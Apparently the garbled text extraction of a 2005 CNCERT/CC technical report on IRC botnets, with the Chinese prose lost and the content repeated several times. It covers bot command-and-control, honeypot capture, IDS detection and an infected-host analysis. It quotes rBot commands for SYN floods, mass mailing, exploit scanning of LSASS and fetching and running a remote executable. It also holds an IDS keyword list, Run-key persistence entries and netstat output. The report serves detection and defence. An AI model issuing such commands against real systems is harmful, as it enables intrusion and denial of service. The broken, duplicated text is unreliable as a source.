View
240
Download
0
Category
Preview:
Citation preview
CNCERTCC
CNCERTCC CNCERTCC_TR_2005-001(Draft)
Worm DDos Spam
Phishing Spyware
Botnet
[1]
Bot
DDos
DDos
Bot plusmnRobo
Bot
Zombie Zombie Bot Bot
Zombie Bot Bot
Zombie
IRC Bot IRC Bot IRC Bot
Channel
IRC Bot
Bot IRC Bot Bot
CommandampControl Server IRC Bot IRC amp
CampC S
BotNet Bot CampC S
IRC 1
Bot
IRC
1 IRC
IRC
Bot
Bot
IRC
AOL Bot IRC Bot AOL AIM-Canbot
Fizzer AOL Instant Messager Bot
P2P Bot Bot
phatbot P2P
Bot 90 Unix Bot 1993
Eggdrop Bot Bot IRC
Bot Bot Bot
Bot Bot IRC Bot Bot Bot 036hotmailcom
MSN Bot
1999
11 SubSeven 21 IRC
IRC Bot IRC Bot
Bot IRC Bot Bot
Windows Spam DDos Bot
Bot (Worm) Bot
Bot 2003 Deloader Bot
Bot Bot
Bot
Bot
Trojan Horse Bot
IP Bot
IRC DCC
Bot
Spyware
2
Bot
trojan horse
worm
Spyware
virus
2
1
2001
[16]
Botnet
2004 3 19
Witty Witty 10
110 20 50
2
DDoS DDoS
DDoS
DDoS
DDoS DDoS
3
IP CERT MessageLab [9][10] DDoS
4
5
6
socks
IRC IRC Bot
1 IRC Internet Relay Chat
IRC RFC1459 IRC Channel
IRC
IRC IRC IRC
irc263net IP IP IRC Server
A IP1 B IP2 A B
IRC Server irc263net
IRC
IRC TCP 6667 6000 7000
IRC Bot 443 8000 500
IRC
2 IRC Bot
IRC Bot IRC IRC
HIRC mIRC 1 IRC Bot IRC
2 IRC Bot
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PINGPONG IRC Bot
5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
Zombie Zombie Bot Bot
Zombie Bot Bot
Zombie
IRC Bot IRC Bot IRC Bot
Channel
IRC Bot
Bot IRC Bot Bot
CommandampControl Server IRC Bot IRC amp
CampC S
BotNet Bot CampC S
IRC 1
Bot
IRC
1 IRC
IRC
Bot
Bot
IRC
AOL Bot IRC Bot AOL AIM-Canbot
Fizzer AOL Instant Messager Bot
P2P Bot Bot
phatbot P2P
Bot 90 Unix Bot 1993
Eggdrop Bot Bot IRC
Bot Bot Bot
Bot Bot IRC Bot Bot Bot 036hotmailcom
MSN Bot
1999
11 SubSeven 21 IRC
IRC Bot IRC Bot
Bot IRC Bot Bot
Windows Spam DDos Bot
Bot (Worm) Bot
Bot 2003 Deloader Bot
Bot Bot
Bot
Bot
Trojan Horse Bot
IP Bot
IRC DCC
Bot
Spyware
2
Bot
trojan horse
worm
Spyware
virus
2
1
2001
[16]
Botnet
2004 3 19
Witty Witty 10
110 20 50
2
DDoS DDoS
DDoS
DDoS
DDoS DDoS
3
IP CERT MessageLab [9][10] DDoS
4
5
6
socks
IRC IRC Bot
1 IRC Internet Relay Chat
IRC RFC1459 IRC Channel
IRC
IRC IRC IRC
irc263net IP IP IRC Server
A IP1 B IP2 A B
IRC Server irc263net
IRC
IRC TCP 6667 6000 7000
IRC Bot 443 8000 500
IRC
2 IRC Bot
IRC Bot IRC IRC
HIRC mIRC 1 IRC Bot IRC
2 IRC Bot
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PINGPONG IRC Bot
5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
Bot
Bot
IRC
AOL Bot IRC Bot AOL AIM-Canbot
Fizzer AOL Instant Messager Bot
P2P Bot Bot
phatbot P2P
Bot 90 Unix Bot 1993
Eggdrop Bot Bot IRC
Bot Bot Bot
Bot Bot IRC Bot Bot Bot 036hotmailcom
MSN Bot
1999
11 SubSeven 21 IRC
IRC Bot IRC Bot
Bot IRC Bot Bot
Windows Spam DDos Bot
Bot (Worm) Bot
Bot 2003 Deloader Bot
Bot Bot
Bot
Bot
Trojan Horse Bot
IP Bot
IRC DCC
Bot
Spyware
2
Bot
trojan horse
worm
Spyware
virus
2
1
2001
[16]
Botnet
2004 3 19
Witty Witty 10
110 20 50
2
DDoS DDoS
DDoS
DDoS
DDoS DDoS
3
IP CERT MessageLab [9][10] DDoS
4
5
6
socks
IRC IRC Bot
1 IRC Internet Relay Chat
IRC RFC1459 IRC Channel
IRC
IRC IRC IRC
irc263net IP IP IRC Server
A IP1 B IP2 A B
IRC Server irc263net
IRC
IRC TCP 6667 6000 7000
IRC Bot 443 8000 500
IRC
2 IRC Bot
IRC Bot IRC IRC
HIRC mIRC 1 IRC Bot IRC
2 IRC Bot
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PINGPONG IRC Bot
5) PRIVMSG Channel msg Bot
6) DCC SEND Bot
3
(Bot) IRC
P2P
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
Bot (Worm) Bot
Bot 2003 Deloader Bot
Bot Bot
Bot
Bot
Trojan Horse Bot
IP Bot
IRC DCC
Bot
Spyware
2
Bot
trojan horse
worm
Spyware
virus
2
1
2001
[16]
Botnet
2004 3 19
Witty Witty 10
110 20 50
2
DDoS DDoS
DDoS
DDoS
DDoS DDoS
3
IP CERT MessageLab [9][10] DDoS
4
5
6
socks
IRC IRC Bot
1 IRC Internet Relay Chat
IRC RFC1459 IRC Channel
IRC
IRC IRC IRC
irc263net IP IP IRC Server
A IP1 B IP2 A B
IRC Server irc263net
IRC
IRC TCP 6667 6000 7000
IRC Bot 443 8000 500
IRC
2 IRC Bot
IRC Bot IRC IRC
HIRC mIRC 1 IRC Bot IRC
2 IRC Bot
IRC Bot IRC GT bot
IRC mIRC mIRC
mIRC mIRC GT bot
mIRC
IRC Bot IRC IRC Bot
IRC
1 NICK USER Bot IRC
2 PASS IRC PASS TCP
3 JOIN Channel key key
3) MODE IRC Bot
4) PING PONG IRC IRC
PING PONG PING
IRC IRC Bot
PINGPONG IRC Bot
